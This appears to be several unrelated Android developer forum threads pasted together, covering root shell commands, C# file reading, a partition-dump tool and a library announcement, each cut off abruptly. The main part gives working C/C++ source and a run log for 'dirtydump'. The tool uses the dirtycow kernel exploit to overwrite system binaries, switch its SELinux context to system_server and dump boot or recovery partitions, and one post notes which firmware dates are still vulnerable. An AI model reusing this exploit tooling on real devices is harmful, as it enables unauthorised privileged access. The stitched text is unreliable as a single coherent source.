Hello!
I need to set the system time!
What i read up to now is, that it is not possible! because it needs sec. level 3 (only System and Signed)....
I tryed it with:
Runtime rt=Runtime.getRuntime();
rt.exec("su");
rt.exec("date -s 19991212"); //And other sytax..
on the Tablet with ConnectBot its working, because connectBot was installed on the ROM!
The App i am writing is for internal use in my company, and it needs to sync with a Server!
My Tablet (Flytouch 3, Android 2.2) is rooted, so it should be possible to set the time! The App ClockSync (http://forum.xda-developers.com/showthread.php?t=688177) can do it too!
Please help me!
Thanks
Does it have to do so using root, or would launching an Intent to the system settings app be sufficient?
Setting Intend would be not an option!
but for everyone who is looking for a soution found one! (here on XDA (where else? ) http://forum.xda-developers.com/showthread.php?p=4528387#post4528387
calling:runRootCommand("date -s <date&time>");
Code:
public static boolean runRootCommand(String command) {
Process process = null;
DataOutputStream os = null;
try {
process = Runtime.getRuntime().exec("su");
os = new DataOutputStream(process.getOutputStream());
os.writeBytes(command+"\n");
os.writeBytes("exit\n");
os.flush();
process.waitFor();
} catch (Exception e) {
Log.d("*** DEBUG ***", "Unexpected error - Here is what I know: "+e.getMessage());
return false;
}
finally {
try {
if (os != null) {
os.close();
}
process.destroy();
} catch (Exception e) {
// nothing
}
}
return true;
}
just for ur information because i was looking for the syntax to set the date and time for about 2hours now, could find it in the inet :/
and finally i found it by hacking a lot of possible combinations in the terminal! and it is:
date -s yyymmdd.hhmmss
Example: 20110717.175930
Hi, i was developing a tasker and to kill the apps i was using this script
Code:
String command = "pidof -s " + intent.getComponent().getPackageName() + " | kill -9 .";
Process su = Runtime.getRuntime().exec("su");
DataOutputStream os = new DataOutputStream(su.getOutputStream());
os.writeBytes(command + "\n");
os.flush();
I tested doing that in the terminal and works fine, but in my tasker, when this command executes the phone reboot... is very strange
Any tip??
Any ideas????
Could you please more code? What's the cycle of your app?
I have a Service listening events, when a event occurs the BroadcastReceiver whose respond to that event respond calling a extended procedure called openKill,that proc checks if must open or kill the intent of the app received, here is when check the kill option:
Code:
else if(action.equals(TaskerConstants.KILL))
{
String command = "pidof -s " + intent.getComponent().getPackageName() + " | kill -9 .";
Root.sudo(command);//Si es 0 entonces no está corriendo
}
When the user check the option kill, the app request su, and if accepts, then the kill option is saved in the task created(which contains the intent of the app to open/kill)
sudo is like this:
Code:
public static void sudo(String command)
{
Process su = null;
try
{
su = Runtime.getRuntime().exec("su");
DataOutputStream os = new DataOutputStream(su.getOutputStream());
os.writeBytes(command + "\n");
os.flush();
os.writeBytes("exit\n");
os.flush();
} catch (IOException e)
{
e.printStackTrace();
}
}
I suspect a false intent reference. It's too less code to be able to figure everything out but thats what I were going to looking for.
intent.getComponent().getPackageName()
Click to expand...
Click to collapse
Do you've printed this simply in your logcat? What does it return? I think it's the PID of your own process.
Hi again... i'm still trying to figure out why is rebooting..., I checked your suggestion but the PID obtained is correct... is the PID of the app i'm trying to kill,
I think i have not rights to do the kill, and for that the Kernel crashes, because when my app exec the script, the phone lags, hot reboot and i get the Boot animation,
Any tip of how debug it?, and the logcat persist after the reboot??
Thats a problem, however, the log-data is just buffered in the RAM, that means, it doesn't persist after a reboot. You should log data in text-files on your own (add this part in your script or your java application) so you can see when the error appears. You can also print the logcat data in a file.
Ok, i tried to save the output in a file, but the file is empty... i changed the openKill method like this:
Code:
protected static void openKill(Intent intent, Integer action)
{
if(action.equals(TaskerConstants.OPEN))
{
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
ctx.startActivity(intent);
}
else if(action.equals(TaskerConstants.KILL))
{
if(Root.root())
{
String command = "pidof -s " + intent.getComponent().getPackageName() + " | kill . >> /mnt/sdcard/err.log";
Root.sudo(command);
}
}
and here is the Root class:
Code:
public class Root
{
public static boolean root()
{
Process su = null;
boolean ret = false,exit = false;
try
{
su = Runtime.getRuntime().exec("su"); //Obtengo un proceso asociado a root
DataOutputStream os = new DataOutputStream(su.getOutputStream());
DataInputStream is = new DataInputStream(su.getInputStream());
if (os != null && is != null)
{
os.writeBytes("id\n"); //Escribo en la consola y pido el id
os.flush();
String uid = is.readLine();
if(uid == null) //Si es null no pude pedir el comando con exito, por lo tanto no hay root!
{
ret = false;
exit = false;
}
else if(uid.contains("uid=0"))
{
ret = true;
exit = true;
}
else
{
ret = false;
exit = true;
}
if(exit)
{
os.writeBytes("exit\n");
os.flush();
}
}
}
catch (IOException e)
{
e.printStackTrace();
}
return ret;
}
public static void sudo(String command)//Antes de llamar a este metodo LLAMAR SIEMPRE A ROOT para verificar los permisos
{
Process su = null;
try
{
su = Runtime.getRuntime().exec("su");
DataOutputStream os = new DataOutputStream(su.getOutputStream());
DataInputStream is = new DataInputStream(su.getInputStream());
os.writeBytes(command + "\n");
os.flush();
Log.v("RET------------------------------------------------------------------>", is.readLine());
os.writeBytes("exit\n");
os.flush();
} catch (IOException e)
{
e.printStackTrace();
}
}
}
So why the script fails like this??, i think the problem is the way i'm calling the script, but i don't really know, the only "weird way" of calling the script is that i'm calling it from a BroadcastReceiver instantiated in a Service, and register the IntentFilter dinamically for each BroadcastReceiver, like, headset plug, screen off and stuff like that, but i don't know how to proceed in this point...
Any help will be very appreciated, thanks!
Is working!
I did it!! , i just changed the script like this and is working
Code:
String command = "killall -9 " + intent.getComponent().getPackageName();
well i still don't know why was not working with kill, but whatever, thanks for the help!
I need read 10 byte in fileName and save it into bitLevel
My code:
PHP:
test = 0;
byte[] bitLevel = new byte[10];
string fileName = "levels\\";
switch(iChap){
case 1: fileName += "beginner.dat";
break;
case 2: fileName += "normal.dat";
break;
case 3: fileName += "intermediate.dat";
break;
case 4: fileName += "expert.dat";
break;
}
using(FileStream fileStream = new FileStream(fileName, FileMode.Open, FileAccess.Read))
{
fileStream.Seek((iLevel - 1) * 10, SeekOrigin.Begin);
fileStream.Read(bitLevel, 0,10);
test = 1;
}
but bitLevel is empty
It seem it's not into codes under using, because I set test = 1; but it = 0;
can anybody help me?
//sorry my bad english
Use IsolatedStorageFile & IsolatedStorageFileStream instead of FileStream.
sensboston said:
Use IsolatedStorageFile & IsolatedStorageFileStream instead of FileStream.
Click to expand...
Click to collapse
is that ok?
can you show me demo code?
Code:
using (IsolatedStorageFile isf = IsolatedStorageFile.GetUserStoreForApplication())
try
{
using (IsolatedStorageFileStream inStream = new IsolatedStorageFileStream(fileName, FileMode.Open, isf))
{
byte[] buffer = new byte[10];
int numRead = inStream.Read(buffer, 0, 10);
Debug.Assert (numRead == 10);
}
}
catch (Exception e)
{
Debug.WriteLine(e.Message + "\n" + e.StackTrace);
}
But this code for ISF only; I don't really know where are your files located (as resources or may be content). You should understand what are you trying to read first
If you added these files as a content to your project, you should read 'em from the TitleContainer
Code:
using (var inStream = TitleContainer.OpenStream(fileName))
using (StreamReader streamReader = new StreamReader(inStream))
... and so on...
Hi,
A little tool or frontend that I've made and share to the community.
Intro
If you are like me :
Searching a way to backup your device, try some tools like SP Flash Tool, or MTK Droid Tools (for generating a Scatter File).
I have found a lot of thread, but I've allways got a dead end or a risk to brick the device (Never take a risk to brick your device if no stock rom available or backup).
A few days ago, i've found this thread : https://forum.xda-developers.com/v20/development/h918-recowvery-unlock-v20-root-shell-t3490594
It's not for my device, it's maybe not for your device, but help a lot to do our need. This exploit work for everyone and what to do the little tools below.
What's the change ?
Instead of that does jcadduono (a big thanks to him), via applypatch, it don't patch the recovery partition to run an Android in Permissive mode, my applypatch only open and read the boot or recovery partition and display all data to logging (binary converted to hex value).
Yes, I know, logging is not for that, it's realy hard-core, but it's the only way working. I've tried with socket, but SELinux in Enforced mode don't allow this.
You can see my recowvery-applypatch.c below :
Code:
#include <unistd.h>
#include <stdio.h>
#include <stdint.h>
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <time.h>
#include <fcntl.h>
#include <sys/stat.h>
#define APP_NAME "recowvery"
#define HOST_NAME "applypatch"
#ifdef DEBUG
#include <android/log.h>
#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, APP_NAME, __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); }
#define LOGE(...) { __android_log_print(ANDROID_LOG_ERROR, APP_NAME, __VA_ARGS__); fprintf(stderr, __VA_ARGS__); fprintf(stderr, "\n"); }
#else
#define LOGV(...) { printf(__VA_ARGS__); printf("\n"); }
#define LOGE(...) { fprintf(stderr, __VA_ARGS__); fprintf(stderr, "\n"); }
#endif
#define SEP LOGV("------------")
#include "bootimg.h"
/* Time delay in microsecond for next loop (1000 = 1ms)
* 250 is good for every PC
* (you can try with 0 to boost the process, but you can have an <unexpected EOF>)
*/
#define DELAY_T 250
void delay(long t)
{
if (t == 0)
return;
long timens = t * 1000;
nanosleep((const struct timespec[]){{0, timens}}, NULL);
}
/*
* Search in *str the word *word.
* &rslt => Result, a sort of substr version of *str from 0 to the last char of the searched *word if found.
* &len => Length of &rslt.
*
* Return 0 if found or -1 if not found.
* (A substr like)
*/
int findStr(char *str, char *word, char** rslt, int* len)
{
int i = 0;
int j = 0;
int allmatch = 0;
char *temp;
*len = 0;
for (i = 0; i < (int)strlen(str); i++)
{
if (str[i] == word[0])
{
allmatch = 0;
for (j = 0; j < (int)strlen(word); j++)
{
if (str[i + j] != word[j])
{
allmatch = 1;
break;
}
}
if (allmatch == 0)
{
*len = i + strlen(word);
break;
}
}
}
if (*len != 0)
{
temp = malloc(*len);
for (i = 0; i < *len; i++)
temp[i] = str[i];
*rslt = temp;
return 0;
}
return -1;
}
/*
* run "mount" and find "/by-name/" from result.
* if matched, fill path var
* return 0 if success else -1
*/
int getBlockDevice(char** path)
{
FILE* cmd;
char br[512];
char* search = "/by-name/";
char* tmp;
int slength = 0;
cmd = popen("mount 2>&1", "r");
if (cmd)
{
/* Read result and try to find the first corresponding mount point */
while(fgets(br, sizeof br, cmd) != NULL)
{
/* If found, log the result */
if (findStr(br, search, &tmp, &slength) != -1)
{
/* Append "boot" (your can replace this by "recovery", "system") at the end */
sprintf(*path, "%srecovery", tmp);
break;
}
}
fclose(cmd);
}
else
{
LOGE("ERROR Getting filesystem mountpoint");
}
if (slength > 0)
return 0;
else
return -1;
}
int main(int argc, char **argv)
{
int ret = 0;
int i = 0;
LOGV("Welcome to %s! (%s)", APP_NAME, HOST_NAME);
char *blockDev = malloc(256);
if (getBlockDevice(&blockDev) == -1)
{
LOGE("ERROR : Could not find FileSystem mount point.");
ret = errno;
goto oops;
}
else
{
LOGV("BLOCK_DEVICE : %s", blockDev);
SEP;
}
/*
* Sometimes <applypatch> run before <dirtycow> finish its process that cause our device not ready to start <adb logcat -s recowvery>
* and we have to wait more than 3min...
* A little sleep of 30 sec ensure that our device is ready.
*/
LOGV("The process start in 30s");
sleep(30);
byte rb[32];
char *content = malloc(256);
FILE *fp;
size_t nread;
fp = fopen(blockDev, "r");
if (fp) {
LOGV("*** DUMP START ***");
while ((nread = fread(rb, 1, sizeof rb, fp)) > 0)
{
sprintf(content, "HEXDUMP = [");
for (i = 0; i < (int)nread; i++)
{
if (i == 0)
sprintf(content, "%s%.2x", content, rb[i]);
else
sprintf(content, "%s,%.2x", content, rb[i]);
}
sprintf(content, "%s];", content);
LOGV("%s", content);
/* sleep to prevent any unexpected EOF with with pipe stream */
delay(DELAY_T);
}
if (ferror(fp)) {
ret = errno;
LOGE("*** DUMP ERROR ***");
LOGE("Error while reading the file...");
}
LOGV("*** DUMP END ***");
fclose(fp);
}
else
{
LOGV("Can't read the file...");
ret = errno;
goto oops;
}
return 0;
oops:
LOGE("*** DUMP ERROR ***");
LOGE("Error %d: %s", ret, strerror(ret));
LOGE("Exiting...");
return ret;
}
Don't laugh please, I am very new in C
Ok, but about the tool ?
The tool is a frontend and easy to use, it copy exploit files for you, run exploit, read logging from adb and do the revert of applypatch (Convert hex to binary and write them to the image file) and finaly reboot your device when it's finish.
An example here :
Code:
~/Documents/dirtydump/bin/Debug$ ./dirtydump boot
***************
**** Init *****
***************
adb push ./bin/dirtycow /data/local/tmp
159 KB/s (9984 bytes in 0.061s)
adb push ./bin/recowvery-applypatch_boot /data/local/tmp
234 KB/s (10200 bytes in 0.042s)
adb push ./bin/recowvery-applypatch_recovery /data/local/tmp
238 KB/s (10200 bytes in 0.041s)
adb push ./bin/recowvery-app_process64 /data/local/tmp
240 KB/s (10200 bytes in 0.041s)
adb push ./bin/recowvery-app_process32 /data/local/tmp
411 KB/s (17992 bytes in 0.042s)
adb shell chmod 0777 /data/local/tmp/dirtycow
adb shell chmod 0777 /data/local/tmp/recowvery-applypatch_boot
adb shell chmod 0777 /data/local/tmp/recowvery-applypatch_recovery
adb shell chmod 0777 /data/local/tmp/recowvery-app_process64
adb shell chmod 0777 /data/local/tmp/recowvery-app_process32
* Android x64 version detected.
**********************
**** Run Exploit *****
**********************
adb shell /data/local/tmp/dirtycow /system/bin/applypatch /data/local/tmp/recowvery-applypatch_boot
warning: new file size (10200) and file old size (74712) differ
size 74712
[*] mmap 0x7faa6a7000
[*] exploit (patch)
[*] currently 0x7faa6a7000=10102464c457f
[*] madvise = 0x7faa6a7000 74712
[*] madvise = 0 1048576
[*] /proc/self/mem 1031798784 1048576
[*] exploited 0x7faa6a7000=10102464c457f
adb shell /data/local/tmp/dirtycow /system/bin/app_process64 /data/local/tmp/recowvery-app_process64
warning: new file size (10200) and file old size (22456) differ
size 22456
[*] mmap 0x7f8f303000
[*] exploit (patch)
[*] currently 0x7f8f303000=10102464c457f
[*] madvise = 0x7f8f303000 22456
[*] madvise = 0 1048576
[*] /proc/self/mem 2071986176 1048576
[*] exploited 0x7f8f303000=10102464c457f
*********************************
**** adb logcat -s recowvery ****
*********************************
--------- beginning of main
--------- beginning of system
--------- beginning of crash
01-24 15:40:37.206 5266 5266 I recowvery: Welcome to recowvery! (app_process64)
01-24 15:40:37.206 5266 5266 I recowvery: ------------
01-24 15:40:37.206 5266 5266 I recowvery: Current selinux context: u:r:zygote:s0
01-24 15:40:37.206 5266 5266 I recowvery: Set context to 'u:r:system_server:s0'
01-24 15:40:37.206 5266 5266 I recowvery: Current security context: u:r:system_server:s0
01-24 15:40:37.206 5266 5266 I recowvery: Setting property 'ctl.start' to 'flash_recovery'
01-24 15:40:37.211 5266 5266 I recowvery: ------------
01-24 15:40:37.211 5266 5266 I recowvery: Recovery flash script should have started!
01-24 15:40:37.211 5266 5266 I recowvery: Run on your PC or device to see progress: adb logcat -s recowvery
01-24 15:40:37.211 5266 5266 I recowvery: Waiting 3 minutes to try again (in case it didn't start or you forgot to dirtycow applypatch first)...
01-24 15:40:37.242 5269 5269 I recowvery: Welcome to recowvery! (applypatch)
01-24 15:40:37.272 5269 5269 I recowvery: BLOCK_DEVICE : /dev/block/platform/mtk-msdc.0/11230000.msdc0/by-name/boot
01-24 15:40:37.272 5269 5269 I recowvery: ------------
01-24 15:40:37.272 5269 5269 I recowvery: The process start in 30s
Start writing to file...
Block read : 524288 (Size : 16777216)
Finish
Image file saved here :
./boot.img
Rebooting your device...
************************
**** Reboot Device *****
************************
How to use ?
Extract all files from archive attached below in a directory of our choice.
./dirtydump boot : dump boot partition and store it to ./boot.img
./dirtydump recovery : dump recovery partition and store it to ./recovery.img
When all done, you have all to make your Custom Recovery for your device.
Requirements
<dirtycow> capable device.
Working adb (adb devices to check)
Linux distribution.
Source code
Code:
#include <iostream>
#include <stdio.h>
#include <regex>
using namespace std;
#define BOOT 0
#define RECOVERY 1
#define ANDROID_64 "64"
#define ANDROID_32 "32"
#ifdef __linux__
#define DIRECTORY_SEPARATOR "/"
#elif __APPLE__
#define DIRECTORY_SEPARATOR "/"
#else
#define DIRECTORY_SEPARATOR "\\"
#endif
typedef unsigned char byte;
static string appDirectory;
static string arch;
static FILE *fsout;
static bool startwrite = false;
static int ncrash = 0;
static int nBlock = 0;
static long currentSize = 0;
// Shorter regex is possible, but I prefer like that.
static regex rs("^.+I recowvery: (\\*\\*\\* DUMP START \\*\\*\\*)\\s+"); // Used to start writting binary file
static regex rl("^.+I recowvery: HEXDUMP = \\[([^\\]]+)\\];\\s+"); // Used to match all data block, and populate < datalist >
static regex rf("^.+I recowvery: (\\*\\*\\* DUMP END \\*\\*\\*)\\s+"); // Used to end writting, and exit infinit loop
static regex re("^.+I recowvery: (\\*\\*\\* DUMP ERROR \\*\\*\\*)\\s+"); // Used to intercept error from < recowvery-applypatch >
static regex radbe("^error:(.+)\\s+"); // ADB cmd error
static regex rarch("^.+(aarch64).*\\s+"); // Get arch from <uname -a>
/**
* Run command
* return : 0 if success else -1 if error
**/
int runcmd(string cmd)
{
char rslt[256];
int cmdv = 0;
FILE *fc = popen(cmd.c_str(), "r");
/* Redirect stderr to stdout */
cmd.append(" 2>&1");
// To remove the \n or \r\n at the end.
regex rcmdline("^(.+)\\s+");
if (fc)
{
while (fgets(rslt, sizeof rslt, fc) != NULL)
{
if (regex_match(string(rslt), rcmdline))
cout << regex_replace(string(rslt), rcmdline, "$1") << endl;
// If error matched, return -1
if (regex_match(rslt, radbe))
{
cmdv = -1;
break;
}
}
cout << endl;
fclose(fc);
}
else
{
cerr << "Error running '" << string(cmd) << "'" << endl;
return -1;
}
return cmdv;
}
/**
* Used to split string
* s : string to split (in)
* delim : used char for split (in)
* elems : string array result (out)
**/
void split(const string &s, char delim, vector<string> &elems) {
stringstream ss;
ss.str(s);
string item;
while (getline(ss, item, delim)) {
elems.push_back(item);
}
}
/**
* Used to split string
* s : string to split (in)
* delim : char delimeter (in)
* return : vector string
**/
vector<string> split(const string &s, char delim) {
vector<string> elems;
split(s, delim, elems);
return elems;
}
/** Convert hex string to byte array **/
void string_to_bytearray(std::string str, unsigned char* &array, int& size)
{
int length = str.length();
// make sure the input string has an even digit numbers
if(length%2 == 1)
{
str = "0" + str;
length++;
}
// allocate memory for the output array
array = new unsigned char[length/2];
size = length/2;
std::stringstream sstr(str);
for(int i=0; i < size; i++)
{
char ch1, ch2;
sstr >> ch1 >> ch2;
int dig1, dig2;
if(isdigit(ch1)) dig1 = ch1 - '0';
else if(ch1>='A' && ch1<='F') dig1 = ch1 - 'A' + 10;
else if(ch1>='a' && ch1<='f') dig1 = ch1 - 'a' + 10;
if(isdigit(ch2)) dig2 = ch2 - '0';
else if(ch2>='A' && ch2<='F') dig2 = ch2 - 'A' + 10;
else if(ch2>='a' && ch2<='f') dig2 = ch2 - 'a' + 10;
array[i] = dig1*16 + dig2;
}
}
/**
* Get architecture type
* Run <adb shell uname -a> and find the word : aarch64
* If found return <ANDROID_64> else <ANDROID_32>
**/
string getArchType()
{
char rslt[256];
string val;
FILE *fc = popen("adb shell uname -a", "r");
// To remove the \n or \r\n at the end.
if (fc)
{
while (fgets(rslt, sizeof rslt, fc) != NULL)
{
if (regex_match(string(rslt), rarch))
{
cout << "* Android x64 version detected." << endl;
val = string(ANDROID_64);
}
else
{
cout << "* Android x32 version detected." << endl;
val = string(ANDROID_32);
}
}
cout << endl;
fclose(fc);
}
else
{
cerr << "Error running 'adb shell uname -a'" << endl;
}
return val;
}
/**
* Display help
**/
void help()
{
cout << "dirtydump boot | recovery" << endl;
cout << "Usage :" << endl;
cout << "\tdirtydump boot : Dump device boot partition and save it to boot.img." << endl;
cout << "\tdirtydump recovery : Dump device recovery partition and save it to recovery.img." << endl << endl;
cout << "Information :" << endl;
cout << "\tThis app use the same exploit explained here : " << endl;
cout << "\thttps://github.com/jcadduono/android_external_dirtycow" << endl;
cout << "\tThe only difference is by the <applypatch>, instead of patching," << endl;
cout << "\tit read your boot / recovery partition." << endl;
cout << "\tConvert all data to hex value, and display it." << endl;
cout << "\tDuring the process, the app read all data through" <<endl;
cout << "\t<adb logcat -s recowvery> and do the reverse," << endl;
cout << "\tconvert all hex value to binary, and write it to a file." << endl;
cout << "\tBecause your device is like crashing, this app reboot" << endl;
cout << "\tautomaticaly when the process is finished." << endl;
cout << endl;
}
/**
* Initialize process.
* Push required files to your device and apply a chmod to them and exit.
**/
int init()
{
cout << "***************" << endl;
cout << "**** Init *****" << endl;
cout << "***************" << endl << endl;
string files[] = {"dirtycow",
"recowvery-applypatch_boot",
"recowvery-applypatch_recovery",
"recowvery-app_process64",
"recowvery-app_process32"};
string cmdlist[] = {"adb shell chmod 0777 /data/local/tmp/dirtycow",
"adb shell chmod 0777 /data/local/tmp/recowvery-applypatch_boot",
"adb shell chmod 0777 /data/local/tmp/recowvery-applypatch_recovery",
"adb shell chmod 0777 /data/local/tmp/recowvery-app_process64",
"adb shell chmod 0777 /data/local/tmp/recowvery-app_process32"};
char cmd[128];
/* Push files to the device */
for(auto s : files)
{
sprintf(cmd, "adb push %s%sbin%s%s /data/local/tmp", appDirectory.c_str(), DIRECTORY_SEPARATOR, DIRECTORY_SEPARATOR, s.c_str());
cout << string(cmd) << endl;
if (runcmd(cmd) != 0)
return -1;
}
/* Apply chmod to the pushed files */
for(auto s : cmdlist)
{
cout << string(s) << endl;
if (runcmd(s) != 0)
return -1;
}
arch = getArchType();
if (arch.empty())
return -1;
return 0;
}
/**
* Apply exploit to applypatch (for boot or process) and app_process64
**/
int runExploit(int v)
{
cout << "**********************" << endl;
cout << "**** Run Exploit *****" << endl;
cout << "**********************" << endl << endl;
string cmdlist[] = {
"", // For applypatch
"" // For app_process
};
if (v == BOOT)
cmdlist[0].append("adb shell /data/local/tmp/dirtycow /system/bin/applypatch /data/local/tmp/recowvery-applypatch_boot");
else if (v == RECOVERY)
cmdlist[0].append("adb shell /data/local/tmp/dirtycow /system/bin/applypatch /data/local/tmp/recowvery-applypatch_recovery");
else
return -1;
if (arch == ANDROID_64)
cmdlist[1] = "adb shell /data/local/tmp/dirtycow /system/bin/app_process64 /data/local/tmp/recowvery-app_process64";
else
cmdlist[1] = "adb shell /data/local/tmp/dirtycow /system/bin/app_process32 /data/local/tmp/recowvery-app_process32";
for(auto s : cmdlist)
{
cout << s << endl;
if (runcmd(s) != 0)
return -1;
}
return 0;
}
/**
* reboot device from adb
**/
int rebootDevice()
{
cout << "************************" << endl;
cout << "**** Reboot Device *****" << endl;
cout << "************************" << endl << endl;
return runcmd(string("adb reboot"));
}
/**
* Function that do the stuff
* If a line contain *** DUMP START *** it start to get all hex value in HEXDUMP = [a1,e2,b4,ect.] and convert to binary before writing to output file.
* All other line are :
* <*** DUMP ERROR ***> : Error during the process, or your device is disconnected, no more battery...
* <*** DUMP END ***> : Dumping is end / end of process.
* <Other lines> : Displayed
**/
int displayLogAndConvertData(string line)
{
/**
* If an unexpected EOF from recowvery-applypatch or if no <pipe>...
* We can't receive a null string, so break the loop, close fsout, and exit the program.
**/
if (line.empty())
{
cout << string("* < null > received !") << endl;
cout << string("Try again...") << endl;
return -1;
}
/**
* *** DUMP START ***
* set startwrite = true to write parsed data to fsout
**/
if (regex_match(line, rs))
{
startwrite = true;
cout << "Start writing to file..." << endl;
}
/**
* Parse all string received if match
* Note :
* It's possible to have matched string before intercept DUMP START,
* If we convert now, it's a good idea to have a broken output file.
**/
if (startwrite && regex_match(line, rl))
{
string s = regex_replace(line, rl, "$1");
vector<string> data = split(s, ',');
for (int c = 0; c < (int)data.size(); c++)
{
try
{
byte *b = NULL;
int sb;
string_to_bytearray(data[c], b, sb);
fwrite(b, 1, sb, fsout);
}
catch (const exception &ex)
{
cout << endl;
cout << string("** Exception **") << endl;
cout << string(" - When convert : ") << data[c] << endl;
cout << string(" - Message : ") << ex.what() << endl;
}
}
nBlock++;
currentSize = nBlock * 32;
cout << "\r";
cout << "Block read : " << nBlock << " (Size : " << currentSize << ")";
}
/**
* Display the other lines (for debuging, logging...)
**/
else if (!regex_match(line, rl) && (!regex_match(line, rf) && !startwrite) && line.length() > 1)
{
cout << line;
}
/**
* *** DUMP END ***
* Flush and close fsout, inform the user, and break the loop.
**/
if (startwrite && regex_match(line, rf))
{
cout << endl << "Finish" << endl;
startwrite = false;
return 1;
}
/**
* *** DUMP ERROR ***
* An error intercepted from ADB, close fsout, set start to false.
* < applypatch > will restart every 3 min.
* We break the loop after 3 errors.
**/
if (regex_match(line, re))
{
cout << std::string("* Error received from ADB *") << std::endl;
startwrite = false;
if (ncrash == 3)
{
cout << std::string("* Too many tries, please check your < recowvery-applypatch.c > and try again.") << std::endl;
return -1;
}
cout << std::string("* Be patient, recowvery-applypatch will restart in a few minutes.") << std::endl;
ncrash++;
}
return 0;
}
/**
* run <adb logcat -s recowvery> and send line by line to <displayLogAndConvertData> function
**/
int readFromLogcat()
{
cout << "*********************************" << endl;
cout << "**** adb logcat -s recowvery ****" << endl;
cout << "*********************************" << endl << endl;
char buff[1024];
int prc = 0;
FILE *fc = popen("adb logcat -s recowvery", "r");
if (fc)
{
while(fgets(buff, sizeof buff, fc) != NULL)
{
prc = displayLogAndConvertData(string(buff));
// Error occuring
if (prc == -1)
{
cerr << "Error during the process !" << endl;
break;
}
// Process finished
if (prc == 1)
break;
}
/*
* When finish or an error received from adb, <startwrite> is set to false.
* If set to true, a NULL string has been received before receiving a DUMP_END or DUMP_ERROR.
* So, so we display an error.
*/
if (startwrite)
{
cerr << "Error during the process !" << endl;
prc = errno;
}
fclose(fc);
}
else
{
cerr << "Error running <adb logcat -s recowvery" << endl;
}
return prc;
}
/** main **/
int main(int argc, char** argv)
{
int ret = 0;
string filename;
if (argc == 1)
{
help();
return ret;
}
/* Fix for windows
* If run in same directory as the exe, return only the exe name without folder where it run.
* So, if DIRECTORY_SEPARATOR not found in argv_str, appDirectory = "." for linux, mac and windows
*/
string argv_str(argv[0]);
if (argv_str.find_last_of(DIRECTORY_SEPARATOR) != string::npos)
appDirectory = argv_str.substr(0, argv_str.find_last_of(DIRECTORY_SEPARATOR));
else
appDirectory = string(".");
ret = init();
if (ret != 0)
return ret;
if (string(argv[1]) == "boot")
{
ret = runExploit(BOOT);
filename = "boot.img";
}
else
{
ret = runExploit(RECOVERY);
filename = "recovery.img";
}
if (ret != 0)
return ret;
else
{
fsout = fopen(filename.c_str(), "wb");
if (!fsout)
{
cerr << "Can't open or create file : <" << string(filename) << ">" << endl;
rebootDevice();
return errno;
}
else
{
ret = readFromLogcat();
fclose(fsout);
}
cout << endl;
cout << "Image file saved here :" << endl;
cout << " " << appDirectory << string(DIRECTORY_SEPARATOR) << string(filename) << endl;
cout << endl;
}
cout << "Rebooting your device..." << endl;
ret = rebootDevice();
return ret;
}
Note :
There is only linux binary, the windows version come soon.
(I don't know why Windows don't work as expected :x)
If you are interested by the source code, I can attach it.
Tested and build from Ubuntu 16.04 (x64) / Code::Blocks & gedit.
If any bug, I will do the best to solve this.
So sorry for my english, or any misspelling :x
Hey man great work
I was in need of such a tool
I needed the recovery partition for andromax x58
Though I dont own the phone its for someone(yeah you understand it right)
And now finally ported Twrp to it
please make compatible for 32 bit device
Hi,
Normaly, it may work for 32bit device, but can't test it :/
Can you give me error log, text displayed on your terminal please ?
And if possible, what do you have when you do : "adb shell uname -a" ? (because I detect 32 or 64bits device by this)
Regards,
Vincent
could you please post the dirty dump executable source code so i can port it to windows?
or just tell me how you determind what binary the device needs?
Ricky Divjakovski said:
could you please post the dirty dump executable source code so i can port it to windows?
or just tell me how you determind what binary the device needs?
Click to expand...
Click to collapse
The boss Appear.What a pleasant thing it is.
China user
Ricky Divjakovski said:
could you please post the dirty dump executable source code so i can port it to windows?
or just tell me how you determind what binary the device needs?
Click to expand...
Click to collapse
Hi and sorry for the time to answer...
I've added the source code at the end of the first post
The Hard Gamer said:
Hey man great work
I was in need of such a tool
I needed the recovery partition for andromax x58
Though I dont own the phone its for someone(yeah you understand it right)
And now finally ported Twrp to it
Click to expand...
Click to collapse
Hai Bro,what command you issue in linux to run ?
Thks
Hmm this is awesome except the part it doesn't work on Ubuntu 14.04 and source code need gcc-4.9 to build (not sure).
Anyway I will install Ubuntu 16.04 to make new things to LG K4 (2016) [MTK MT6735m], good job thanks for it
@Vince_02100 what compilers did you used to applypatch and app_process64?
I need to compile a version to armv7(aka 32), since my current device (the LG K4) have a x32 Android and a x64 CPU.
I'm improving your dirtydump but with limitations since I don't know much about C/C++.
Please reply or PM me, anyway I will try my best to make it x32 support
@Vince_02100
My question is, did you base the operation of your tool on the dirtycow exploit? Seems like it because of its name and reference to jcadduono.
This is actually awesome then because I have a tool very similar only it works as a shell command handler. The Greyhat Root Console essentially is it's own Terminal Interface specifically to use dirtycow for root shell commands.
I only bring that up because Stock OEM builds that are dated October 2016 or later pretty much can't utilize CVE-2016-5195. Some didn't get patched that soon but most did. The rule of thumb I've always had when working with Dirtycow is to use stock builds from September 2016. Since they are the most up to date builds still vulnerable. I don't know how many people reading this thread know that.
Here is the thread I made where @droidvoider explains how to use the Greyhat Root Console: https://forum.xda-developers.com/android/help/injecting-root-setting-selinux-stages-t3573036
The thread also details our journey into modifying the Device SEPolicy using the console in order to elevate our normal user privileges. We have the instructions to build the Console for both 32-Bit and 64-Bit Builds of Android 5.1.1 & 6.0.1
I think the source code and our thread may just give you some good insight going forward with your tool, even though The Greyhat Root Console was developed on an AT&T Galaxy Note 5. That thread is a gold mine for dirtycow information.
Thanks for your great tool and explanation @Vince_02100. I'm researching to dump boot, recovery for Onkyo DP-CMX1 to make custom TWRP. I have some stupid questions and need your help like following:
1. Tool will not break system partition and it can boot normally after dumping recovery, boot?
2. I don't have root so how can I copy dumped files: ./boot.img , ./recovery.img to /sdcard or to computer? Do I edit your code
fp = fopen(blockDev, "r"); to make it write to /sdcard/boot.img?
This library is dedicated to xda-developers with love
Description:
SharpOdinClient is a .NET library that allows .NET applications to communicate with samsung android devices in download mode.
A suitable client for flash(image , tar.md5 , lz4), getting info and implementing other features.
It provides a .NET implementation of the odin protocol.
How does work?USB communication in SharpOdinClient is serialport.
install Official Samsung usb driver
Connect your device in download mode
Requirements:
.NET Framework 4.5.1
Official Samsung usb driver
Download Latest Release
Github
NuGet
Namespaces
first add namespaces of SharpOdinClient on your project
Code:
using SharpOdinClient.structs;
